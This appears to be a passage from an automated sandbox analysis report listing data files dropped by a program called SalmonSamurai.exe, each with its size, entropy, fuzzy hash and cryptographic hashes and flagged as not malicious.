                                                                                                                                                                                                                                              SHA-512:5F5B280261195B8894EFAE9DF2BECE41C6C6A72199D65BA633C30D50A579F95FA04916A30DB77831F517B22449196D364D6F70D10D6C5B435814184B3BCF1667
                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                              Process:C:\Users\user\Desktop\SalmonSamurai.exe
                                                                                                                                                                                                                                              File Type:data
                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                              Size (bytes):701716
                                                                                                                                                                                                                                              Entropy (8bit):4.66095894344634
                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                              SSDEEP:12288:7Od6KqVw2iILlY+dAs1aQUfjoaVV4FH2mFxvx35uKN3CuKb7szmV2Jfu64K+z5jG:KsKqJi6lY+dAs1aQU7yZx35uK4XQzQI9
                                                                                                                                                                                                                                              MD5:A19269683A6347E07C55325B9ECC03A4
                                                                                                                                                                                                                                              SHA1:D42989DAF1C11FCFFF0978A4FB18F55EC71630EC
                                                                                                                                                                                                                                              SHA-256:AD65351A240205E881EF5C4CF30AD1BC6B6E04414343583597086B62D48D8A24
                                                                                                                                                                                                                                              SHA-512:1660E487DF3F3F4EC1CEA81C73DCA0AB86AAF121252FBD54C7AC091A43D60E1AFD08535B082EFD7387C12616672E78AA52DDDFCA01F833ABEF244284482F2C76
                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                              Process:C:\Users\user\Desktop\SalmonSamurai.exe
                                                                                                                                                                                                                                              File Type:data
                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                              Size (bytes):904943
                                                                                                                                                                                                                                              Entropy (8bit):4.273773274227575
                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                              SSDEEP:1536:wqf22AwWk+ADszaaH0PaMadiMNKVbVtQW01jilDouMGsW2uMBVr+9RU4yVS5PMxq:1zW/AMfafVoCp8YbkJBbdJ2DB5y0XlRB
                                                                                                                                                                                                                                              MD5:5CDD07FA357C846771058C2DB67EB13B
                                                                                                                                                                                                                                              SHA1:DEB87FC5C13DA03BE86F67526C44F144CC65F6F6
                                                                                                                                                                                                                                              SHA-256:01C830B0007B8CE6ACA46E26D812947C3DF818927B826F7D8C5FFD0008A32384
                                                                                                                                                                                                                                              SHA-512:2AC29A3AA3278BD9A8FE1BA28E87941F719B14FBF8B52E0B7DC9D66603C9C147B9496BF7BE4D9E3AA0231C024694EF102DCC094C80C42BE5D68D3894C488098C
                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                              Process:C:\Users\user\Desktop\SalmonSamurai.exe
                                                                                                                                                                                                                                              File Type:data
                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                              Size (bytes):426906
                                                                                                                                                                                                                                              Entropy (8bit):5.400864409916039
                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                              SSDEEP:12288:+XnGrijIs3cSlFEYLCJBB43nbhjJSwmrwiwWzM1ldLbpuQ16BtryBBwIle3nei3X:iNV4ossMNu51hnW5CptA
                                                                                                                                                                                                                                              MD5:D259469E94F2ADF54380195555154518
                                                                                                                                                                                                                                              SHA1:D69060BBE8E765CA4DC1F7D7C04C3C53C44B8AB5
                                                                                                                                                                                                                                              SHA-256:F98B7442BEFC285398A5DD6A96740CBA31D2F5AADADD4D5551A05712D693029B
                                                                                                                                                                                                                                              SHA-512:D0BD0201ACF4F7DAA84E89AA484A3DEC7B6A942C3115486716593213BE548657AD702EF2BC1D3D95A4A56B0F6E7C33D5375F41D6A863E4CE528F2BD6A318240E
                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                              Process:C:\Users\user\Desktop\SalmonSamurai.exe
                                                                                                                                                                                                                                              File Type:data
                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                              Size (bytes):436202
                                                                                                                                                                                                                                              Entropy (8bit):5.843819816549512
                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                              SSDEEP:6144:U4ftEfqE2jv7ShUjBA59wjd558YAGKND9Gto8QV:U41HE2jjShqywjd558YAbNDcI
                                                                                                                                                                                                                                              MD5:04A680847C4A66AD9F0A88FB9FB1FC7B
                                                                                                                                                                                                                                              SHA1:2AFCDF4234A9644FB128B70182F5A3DF1EE05BE1
                                                                                                                                                                                                                                              SHA-256:1CC44C5FBE1C0525DF37C5B6267A677F79C9671F86EDA75B6FC13ABF5D5356EB
                                                                                                                                                                                                                                              SHA-512:3A8A409A3C34149A977DEA8A4CB0E0822281AED2B0A75B02479C95109D7D51F6FB2C2772CCF1486CA4296A0AC2212094098F5CE6A1265FA6A7EB941C0CFEF83E
                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                              Process:C:\Users\user\Desktop\SalmonSamurai.exe
                                                                                                                                                                                                                                              File Type:data
                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                              Size (bytes):396104
                                                                                                                                                                                                                                              Entropy (8bit):5.454826678090317
                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                              SSDEEP:6144:Q3rSn4RJ28687mlwlGXaJwZkqEb1Phv6VP5yarXGzOJixhd4/TWwS:eND/xqkqEO5nrFTq
                                                                                                                                                                                                                                              MD5:1A53D374B9C37F795A462AAC7A3F118F
                                                                                                                                                                                                                                              SHA1:154BE9CF05042ECED098A20FF52FA174798E1FEA
                                                                                                                                                                                                                                              SHA-256:D0C38EB889EE27D81183A0535762D8EF314F0FDEB90CCCA9176A0CE9AB09B820
                                                                                                                                                                                                                                              SHA-512:395279C9246BD30A0E45D775D9F9C36353BD11D9463282661C2ABD876BDB53BE9C9B617BB0C2186592CD154E9353EA39E3FEED6B21A07B6850AB8ECD57E1ED29
                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                              Process:C:\Users\user\Desktop\SalmonSamurai.exe
                                                                                                                                                                                                                                              File Type:data
                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                              Size (bytes):424277
                                                                                                                                                                                                                                              Entropy (8bit):5.503137231857292
                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                              SSDEEP:6144:TFigju3qg4wajEzUKnYm31SOmhqYl51gHNiOIkCJD:TFiecqg1aqHSOu599kCJD
                                                                                                                                                                                                                                              MD5:8E6654B89ED4C1DC02E1E2D06764805A
                                                                                                                                                                                                                                              SHA1:FF660BC85BB4A0FA3B2637050D2B2D1AECC37AD8
                                                                                                                                                                                                                                              SHA-256:61CBCE9A31858DDF70CC9B0C05FB09CE7032BFB8368A77533521722465C57475
                                                                                                                                                                                                                                              SHA-512:5AC71EDA16F07F3F2B939891EDA2969C443440350FD88AB3A9B3180B8B1A3ECB11E79E752CF201F21B3DBFBA00BCC2E4F796F347E6137A165C081E86D970EE61
                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                              Process:C:\Users\user\Desktop\SalmonSamurai.exe
                                                                                                                                                                                                                                              File Type:data
                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                              Size (bytes):769050
                                                                                                                                                                                                                                              Entropy (8bit):4.75072843480339
                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                              SSDEEP:12288:H/58dBquNw2202pgtZSWjZ4LIbsJvaP5A3HKQiEQBR07391qf2utKMaBlS9WffFR:H8BquNw2202pgtsWjyLrJvaRA3HtiEQG
                                                                                                                                                                                                                                              MD5:9528D21E8A3F5BAD7CA273999012EBE8
                                                                                                                                                                                                                                              SHA1:58CD673CE472F3F2F961CF8B69B0C8B8C01D457C
                                                                                                                                                                                                                                              SHA-256:E79C1E7A47250D88581E8E3BAF78DCAF31FE660B74A1E015BE0F4BAFDFD63E12
                                                                                                                                                                                                                                              SHA-512:165822C49CE0BDB82F3C3221E6725DAC70F53CFDAD722407A508FA29605BC669FB5E5070F825F02D830E0487B28925644438305372A366A3D60B55DA039633D7
                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                              Process:C:\Users\user\Desktop\SalmonSamurai.exe
                                                                                                                                                                                                                                              File Type:data
                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                              Size (bytes):344606
                                                                                                                                                                                                                                              Entropy (8bit):5.5169703217013675
                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                              SSDEEP:6144:80kjE55JcUnMP9egFXwqfaYnT9Xa5alSeBNdg:80kQJZnM1XwWT05YScg
                                                                                                                                                                                                                                              MD5:D59E613E8F17BDAFD00E0E31E1520D1F
                                                                                                                                                                                                                                              SHA1:529017D57C4EFED1D768AB52E5A2BC929FDFB97C
                                                                                                                                                                                                                                              SHA-256:90E585F101CF0BB77091A9A9A28812694CEE708421CE4908302BBD1BC24AC6FD
                                                                                                                                                                                                                                              SHA-512:29FF3D42E5D0229F3F17BC0ED6576C147D5C61CE2BD9A2E658A222B75D993230DE3CE35CA6B06F5AFA9EA44CFC67817A30A87F4FAF8DC3A5C883B6EE30F87210
                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                              Process:C:\Users\user\Desktop\SalmonSamurai.exe
                                                                                                                                                                                                                                              File Type:data
                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                              Size (bytes):347111
                                                                                                                                                                                                                                              Entropy (8bit):5.508989875739037
                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                              SSDEEP:6144:xiLqIY2MuZYLMMP9ecGmM8faYdY4K55TiSbn8vMwS:xiLqIp34MM+mM0Y55eSKMwS
                                                                                                                                                                                                                                              MD5:5E3813E616A101E4A169B05F40879A62
                                                                                                                                                                                                                                              SHA1:615E4D94F69625DDA81DFAEC7F14E9EE320A2884
                                                                                                                                                                                                                                              SHA-256:4D207C5C202C19C4DACA3FDDB2AE4F747F943A8FAF86A947EEF580E2F2AEE687
                                                                                                                                                                                                                                              SHA-512:764A271A9CFB674CCE41EE7AED0AD75F640CE869EFD3C865D1B2D046C9638F4E8D9863A386EBA098F5DCEDD20EA98BAD8BCA158B68EB4BDD606D683F31227594
                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                              Process:C:\Users\user\Desktop\SalmonSamurai.exe
                                                                                                                                                                                                                                              File Type:data
                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                              Size (bytes):421147
                                                                                                                                                                                                                                              Entropy (8bit):5.3798866108688905
                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                              SSDEEP:3072:34e5fql0vt1s9zjzVMY/6+yN9d8piKkGp2Ioiw/QbuOXV5blUB0GLF96RRIHKxgY:34e5Sktm92Yfhpjq+5wLF96oSdc4
                                                                                                                                                                                                                                              MD5:7F6696CC1E71F84D9EC24E9DC7BD6345
                                                                                                                                                                                                                                              SHA1:36C1C44404EE48FC742B79173F2C7699E1E0301F
                                                                                                                                                                                                                                              SHA-256:D1F17508F3A0106848C48A240D49A943130B14BD0FEB5ED7AE89605C7B7017D1
                                                                                                                                                                                                                                              SHA-512:B226F94F00978F87B7915004A13CDBD23DE2401A8AFAA2517498538967DF89B735F8ECC46870C92E3022CAC795218A60AD2B8FFF1EFAD9FEEA4EC193704A568A
                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                              Process:C:\Users\user\Desktop\SalmonSamurai.exe
                                                                                                                                                                                                                                              File Type:data
                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                              Size (bytes):421332
                                                                                                                                                                                                                                              Entropy (8bit):5.349883254359391
                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                              SSDEEP:6144:fILAyMcQXU0+/3IgsC5pN+v6Idj3J5Orj7FQoz7L66PZqS:ALAyNQCsupUv6gj3J5OrmoznGS
                                                                                                                                                                                                                                              MD5:A36992D320A88002697DA97CD6A4F251
                                                                                                                                                                                                                                              SHA1:C1F88F391A40CCF2B8A7B5689320C63D6D42935F
                                                                                                                                                                                                                                              SHA-256:C5566B661675B613D69A507CBF98768BC6305B80E6893DC59651A4BE4263F39D
                                                                                                                                                                                                                                              SHA-512:9719709229A4E8F63247B3EFE004ECFEB5127F5A885234A5F78EE2B368F9E6C44EB68A071E26086E02AA0E61798B7E7B9311D35725D3409FFC0E740F3AA3B9B5
                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                              Process:C:\Users\user\Desktop\SalmonSamurai.exe
                                                                                                                                                                                                                                              File Type:data
                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                              Size (bytes):380687
                                                                                                                                                                                                                                              Entropy (8bit):5.464870724176939
                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                              SSDEEP:6144:2Mg++J/xRN0JLnrC4HFJbT/RauiQ/G5LjR43f7LQkPQW:2MmJnq7DG5LjQ
                                                                                                                                                                                                                                              MD5:A94E1775F91EA8622F82AE5AB5BA6765
                                                                                                                                                                                                                                              SHA1:FF17ACCDD83AC7FCC630E9141E9114DA7DE16FDB
                                                                                                                                                                                                                                              SHA-256:1606B94AEF97047863481928624214B7E0EC2F1E34EC48A117965B928E009163
                                                                                                                                                                                                                                              SHA-512:A2575D2BD50494310E8EF9C77D6C1749420DFBE17A91D724984DF025C47601976AF7D971ECAE988C99723D53F240E1A6B3B7650A17F3B845E3DAEEFAAF9FE9B9
                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                              Process:C:\Users\user\Desktop\SalmonSamurai.exe
                                                                                                                                                                                                                                              File Type:data
                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                              Size (bytes):622184
                                                                                                                                                                                                                                              Entropy (8bit):5.029655615738747
                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                              SSDEEP:12288:Kxw5iX9nuyaXTfwHxwNUWGOGfStQEvy1zeItDmNtua/1wMTAKzIxRAQiHedNu36/:Kxw5YuyaXTfwRwNUWGOGfStQEvy1zeIR
                                                                                                                                                                                                                                              MD5:9D273AF70EAFD1B5D41F157DBFB94FDC
                                                                                                                                                                                                                                              SHA1:DA98BDE34B59976D4514FF518BD977A713EA4F2E
                                                                                                                                                                                                                                              SHA-256:319D1E20150D4E3F496309BA82FCE850E91378EE4B0C7119A003A510B14F878B
                                                                                                                                                                                                                                              SHA-512:0A892071BEA92CC7F1A914654BC4F9DA6B9C08E3CB29BB41E9094F6120DDC7A08A257C0D2B475C98E7CDCF604830E582CF2A538CC184056207F196FFC43F29AD
                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                              Process:C:\Users\user\Desktop\SalmonSamurai.exe
                                                                                                                                                                                                                                              File Type:data
                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                              Size (bytes):389118
                                                                                                                                                                                                                                              Entropy (8bit):5.427253181023048
                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                              SSDEEP:6144:nEbM+RtZ9eC6cMkohGZxGseSFOE/xaWEkLl5W5ucHiEi18OWUcrOShPGNgX1wL2:V+/upPgZxaS5W5xHiEi18OWUsU2
                                                                                                                                                                                                                                              MD5:D4B776267EFEBDCB279162C213F3DB22
                                                                                                                                                                                                                                              SHA1:7236108AF9E293C8341C17539AA3F0751000860A
                                                                                                                                                                                                                                              SHA-256:297E3647EAF9B3B95CF833D88239919E371E74CC345A2E48A5033EBE477CD54E
                                                                                                                                                                                                                                              SHA-512:1DC7D966D12E0104AACB300FD4E94A88587A347DB35AD2327A046EF833FB354FD9CBE31720B6476DB6C01CFCB90B4B98CE3CD995E816210B1438A13006624E8F
                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                              Process:C:\Users\user\Desktop\SalmonSamurai.exe
                                                                                                                                                                                                                                              File Type:data
                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                              Size (bytes):438088
                                                                                                                                                                                                                                              Entropy (8bit):5.195613019166525
                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                              SSDEEP:6144:2zHaVyEDQV5aZrU+5xeuhGjZ3ZmA58Pm+7JATvy8:2zNMdU4XA5Imb
                                                                                                                                                                                                                                              MD5:3165351C55E3408EAA7B661FA9DC8924
                                                                                                                                                                                                                                              SHA1:181BEE2A96D2F43D740B865F7E39A1BA06E2CA2B
                                                                                                                                                                                                                                              SHA-256:2630A9D5912C8EF023154C6A6FB5C56FAF610E1E960AF66ABEF533AF19B90CAA
                                                                                                                                                                                                                                              SHA-512:3B1944EA3CFCBE98D4CE390EA3A8FF1F6730EB8054E282869308EFE91A9DDCD118290568C1FC83BD80E8951C4E70A451E984C27B400F2BDE8053EA25B9620655
                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                              Process:C:\Users\user\Desktop\SalmonSamurai.exe
                                                                                                                                                                                                                                              File Type:data
                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                              Size (bytes):454982
                                                                                                                                                                                                                                              Entropy (8bit):5.385096169417585
                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                              SSDEEP:12288:07bju28t6QuagV1ZztzYpZ4MYnYM/LDBW5Mx0q20wCbKZL3wfzkCh1f/5FEs6rYr:6JVzbf55Z
                                                                                                                                                                                                                                              MD5:0BF28AFF31E8887E27C4CD96D3069816
                                                                                                                                                                                                                                              SHA1:B5313CF6B5FBCE7E97E32727A3FAE58B0F2F5E97
                                                                                                                                                                                                                                              SHA-256:2E1D413442DEF9CAE2D93612E3FD04F3AFAF3DD61E4ED7F86400D320AF5500C2
                                                                                                                                                                                                                                              SHA-512:95172B3B1153B31FCEB4B53681635A881457723CD1000562463D2F24712267B209B3588C085B89C985476C82D9C27319CB6378619889379DA4FAE1595CB11992
                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                              Process:C:\Users\user\Desktop\SalmonSamurai.exe
                                                                                                                                                                                                                                              File Type:data
                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                              Size (bytes):879149
                                                                                                                                                                                                                                              Entropy (8bit):4.32399215971305
                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                              SSDEEP:3072:Xz2UMY57hmdUoITsKMaWZKerbtsMhmksd4M+0+z20QmuOAl5VpvoxWnhygfZw/gQ:D2UMY57h9w4MSbsp5cLhdKE8
                                                                                                                                                                                                                                              MD5:7B5F52F72D3A93F76337D5CF3168EBD1
                                                                                                                                                                                                                                              SHA1:00D444B5A7F73F566E98ABADF867E6BB27433091
                                                                                                                                                                                                                                              SHA-256:798EA5D88A57D1D78FA518BF35C5098CBEB1453D2CB02EF98CD26CF85D927707
                                                                                                                                                                                                                                              SHA-512:10C6F4FAAB8CCB930228C1D9302472D0752BE19AF068EC5917249675B40F22AB24C3E29EC3264062826113B966C401046CFF70D91E7E05D8AADCC0B4E07FEC9B
                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                              Process:C:\Users\user\Desktop\SalmonSamurai.exe
                                                                                                                                                                                                                                              File Type:data
                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                              Size (bytes):544193
                                                                                                                                                                                                                                              Entropy (8bit):4.6265566170608325
                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                              SSDEEP:12288:DczykRrlOUmTU2/S9iyBZ60DAf1X2VeQCap4M52QoLpMzu5flmd9DnwWHQgZ:+F55VoQ
                                                                                                                                                                                                                                              MD5:6D787DC113ADFB6A539674AF7D6195DB
                                                                                                                                                                                                                                              SHA1:F966461049D54C61CDD1E48EF1EA0D3330177768
                                                                                                                                                                                                                                              SHA-256:A976FAD1CC4EB29709018C5FFCC310793A7CEB2E69C806454717CCAE9CBC4D21
                                                                                                                                                                                                                                              SHA-512:6748DAD2813FC544B50DDEA0481B5ACE3EB5055FB2D985CA357403D3B799618D051051B560C4151492928D6D40FCE9BB33B167217C020BDCC3ED4CAE58F6B676
                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                              Process:C:\Users\user\Desktop\SalmonSamurai.exe
                                                                                                                                                                                                                                              File Type:data
                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                              Size (bytes):921748
                                                                                                                                                                                                                                              Entropy (8bit):4.3093889077968495
                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                              SSDEEP:3072:zGFGsUtYgPLdROwJgdkFSvf4QAEm5dmGhsYK/GR3TX4/NMdpqdYnLsuFQdXPtg8y:zGEAgT/Zu5J57JtK
                                                                                                                                                                                                                                              MD5:1766A05BE4DC634B3321B5B8A142C671
                                                                                                                                                                                                                                              SHA1:B959BCADC3724AE28B5FE141F3B497F51D1E28CF
                                                                                                                                                                                                                                              SHA-256:0EEE8E751B5B0AF1E226106BEB09477634F9F80774FF30894C0F5A12B925AC35
                                                                                                                                                                                                                                              SHA-512:FAEC1D6166133674A56B5E38A68F9E235155CC910B5CCEB3985981B123CC29EDA4CD60B9313AB787EC0A8F73BF715299D9BF068E4D52B766A7AB8808BD146A39
                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                              Process:C:\Users\user\Desktop\SalmonSamurai.exe
                                                                                                                                                                                                                                              File Type:data
                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                              Size (bytes):423481
                                                                                                                                                                                                                                              Entropy (8bit):5.516218200944141
                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                              SSDEEP:3072:yL0fCmEZW/FhjNmvgVRTKBOS+/6ocIG0uPXuyAF6WI6DkYAiKbeM/ogQbn7xjemW:QYCmNLjN3pV5v5tE77ORS
                                                                                                                                                                                                                                              MD5:8F9498D18D90477AD24EA01A97370B08
                                                                                                                                                                                                                                              SHA1:3868791B549FC7369AB90CD27684F129EBD628BE
                                                                                                                                                                                                                                              SHA-256:846943F77A425F3885689DCF12D62951C5B7646E68EADC533B8B5C2A1373F02E
                                                                                                                                                                                                                                              SHA-512:3C66A84592DEBE522F26C48B55C04198AD8A16C0DCFA05816825656C76C1C6CCCF5767B009F20ECB77D5A589EE44B0A0011EC197FEC720168A6C72C71EBF77FD
                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                              Process:C:\Users\user\Desktop\SalmonSamurai.exe
                                                                                                                                                                                                                                              File Type:data
                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                              Size (bytes):456789
                                                                                                                                                                                                                                              Entropy (8bit):5.643595706627357
                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                              SSDEEP:6144:SGAK2lkJ2gSSSfLOAYkky1MV5QgsZfGRAxY62R9PSam7EEOEeLvx5gR4RStG2r2/:pAKWkJ2gSsAkV5QgsiR4747vx5VL/
                                                                                                                                                                                                                                              MD5:F5E1CA8A14C75C6F62D4BFF34E27DDB5
                                                                                                                                                                                                                                              SHA1:7ABA6BFF18BDC4C477DA603184D74F054805C78F
                                                                                                                                                                                                                                              SHA-256:C0043D9FA0B841DA00EC1672D60015804D882D4765A62B6483F2294C3C5B83E0
                                                                                                                                                                                                                                              SHA-512:1050F96F4F79F681B3EAF4012EC0E287C5067B75BA7A2CBE89D9B380C07698099B156A0EB2CBC5B8AA336D2DAA98E457B089935B534C4D6636987E7E7E32B169
                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                              Process:C:\Users\user\Desktop\SalmonSamurai.exe
                                                                                                                                                                                                                                              File Type:data
                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                              Size (bytes):373937
                                                                                                                                                                                                                                              Entropy (8bit):5.37852966615304
                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                              SSDEEP:6144:Fl9jv1p49ahfjDVnjHFsRmP28Wvr5PdhpvtEDSVsEaOq:FlLpblVnjHFCm+8Sr5Pdhzq
                                                                                                                                                                                                                                              MD5:7B39423028DA71B4E776429BB4F27122
                                                                                                                                                                                                                                              SHA1:CB052AB5F734D7A74A160594B25F8A71669C38F2
                                                                                                                                                                                                                                              SHA-256:3D95C5819F57A0AD06A118A07E0B5D821032EDCF622DF9B10A09DA9AA974885F
                                                                                                                                                                                                                                              SHA-512:E40679B01AB14B6C8DFDCE588F3B47BCAFF55DBB1539B343F611B3FCBD1D0E7D8C347A2B928215A629F97E5F68D19C51AF775EC27C6F906CAC131BEAE646CE1A
                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                              Process:C:\Users\user\Desktop\SalmonSamurai.exe
                                                                                                                                                                                                                                              File Type:data
                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                              Size (bytes):414412
                                                                                                                                                                                                                                              Entropy (8bit):5.287149423624235
                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                              SSDEEP:
                                                                                                                                                                                                                                              MD5:D58A43068BF847C7CD6284742C2F7823
                                                                                                                                                                                                                                              SHA1:497389765143FAC48AF2BD7F9A309BFE65F59ED9
                                                                                                                                                                                                                                              SHA-256:265D8B1BC479AD64FA7A41424C446139205AF8029A2469D558813EDD10727F9C
                                                                                                                                                                                                                                              SHA-512:547A1581DDA28C5C1A0231C736070D8A7B53A085A0CE643A4A1510C63A2D4670FF2632E9823CD25AE2C7CDC87FA65883E0A193853890D4415B38056CB730AB54
                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                              Process:C:\Users\user\Desktop\SalmonSamurai.exe
                                                                                                                                                                                                                                              File Type:data
                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                              Size (bytes):505292
                                                                                                                                                                                                                                              Entropy (8bit):5.701779406023226
                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                              SSDEEP:
                                                                                                                                                                                                                                              MD5:D10D536BCD183030BA07FF5C61BF5E3A
                                                                                                                                                                                                                                              SHA1:44DD78DBA9F098AC61222EB9647D111AD1608960
                                                                                                                                                                                                                                              SHA-256:2A3D3ABC9F80BAD52BD6DA5769901E7B9E9F052B6A58A7CC95CE16C86A3AA85A
                                                                                                                                                                                                                                              SHA-512:C67AEDE9DED1100093253E350D6137AB8B2A852BD84B6C82BA1853F792E053CECD0EA0519319498AED5759BEDC66D75516A4F2F7A07696A0CEF24D5F34EF9DD2
                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                              Process:C:\Users\user\Desktop\SalmonSamurai.exe
                                                                                                                                                                                                                                              File Type:data
                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                              Size (bytes):1012272
                                                                                                                                                                                                                                              Entropy (8bit):4.2289205973296395
                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                              SSDEEP:
                                                                                                                                                                                                                                              MD5:C548A5F1FB5753408E44F3F011588594
                                                                                                                                                                                                                                              SHA1:E064AB403972036DAD1B35ABE9794E95DBE4CC00
                                                                                                                                                                                                                                              SHA-256:890F50A57B862F482D367713201E1E559AC778FC3A36322D1DFBBEF2535DD9CB
                                                                                                                                                                                                                                              SHA-512:6975E4BB1A90E0906CF6266F79DA6CC4AE32F72A6141943BCFCF9B33F791E9751A9AAFDE9CA537F33F6BA8E4D697125FBC2EC4FFD3BC35851F406567DAE7E631
                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                              Process:C:\Users\user\Desktop\SalmonSamurai.exe
                                                                                                                                                                                                                                              File Type:data
                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                              Size (bytes):425545
                                                                                                                                                                                                                                              Entropy (8bit):6.081959799252044
                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                              SSDEEP:
                                                                                                                                                                                                                                              MD5:B4FBFF56E4974A7283D564C6FC0365BE
                                                                                                                                                                                                                                              SHA1:DE68BD097DEF66D63D5FF04046F3357B7B0E23AC
                                                                                                                                                                                                                                              SHA-256:8C9ACDE13EDCD40D5B6EB38AD179CC27AA3677252A9CD47990EBA38AD42833E5
                                                                                                                                                                                                                                              SHA-512:0698AA058561BB5A8FE565BB0BEC21548E246DBB9D38F6010E9B0AD9DE0F59BCE9E98841033AD3122A163DD321EE4B11ED191277CDCB8E0B455D725593A88AA5
                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                              Process:C:\Users\user\Desktop\SalmonSamurai.exe
                                                                                                                                                                                                                                              File Type:data
                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                              Size (bytes):457220
                                                                                                                                                                                                                                              Entropy (8bit):5.634955727013476
                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                              SSDEEP:
                                                                                                                                                                                                                                              MD5:980C27FD74CC3560B296FE8E7C77D51F
                                                                                                                                                                                                                                              SHA1:F581EFA1B15261F654588E53E709A2692D8BB8A3
                                                                                                                                                                                                                                              SHA-256:41E0F3619CDA3B00ABBBF07B9CD64EC7E4785ED4C8A784C928E582C3B6B8B7DB
                                                                                                                                                                                                                                              SHA-512:51196F6F633667E849EF20532D57EC81C5F63BAB46555CEA8FAB2963A078ACDFA84843EDED85C3B30F49EF3CEB8BE9E4EF8237E214EF9ECFF6373A84D395B407
                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                              Process:C:\Users\user\Desktop\SalmonSamurai.exe
                                                                                                                                                                                                                                              File Type:data
                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                              Size (bytes):455871
                                                                                                                                                                                                                                              Entropy (8bit):5.635474464056208
                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                              SSDEEP:
                                                                                                                                                                                                                                              MD5:E4F7D9E385CB525E762ECE1AA243E818
                                                                                                                                                                                                                                              SHA1:689D784379BAC189742B74CD8700C687FEEEDED1
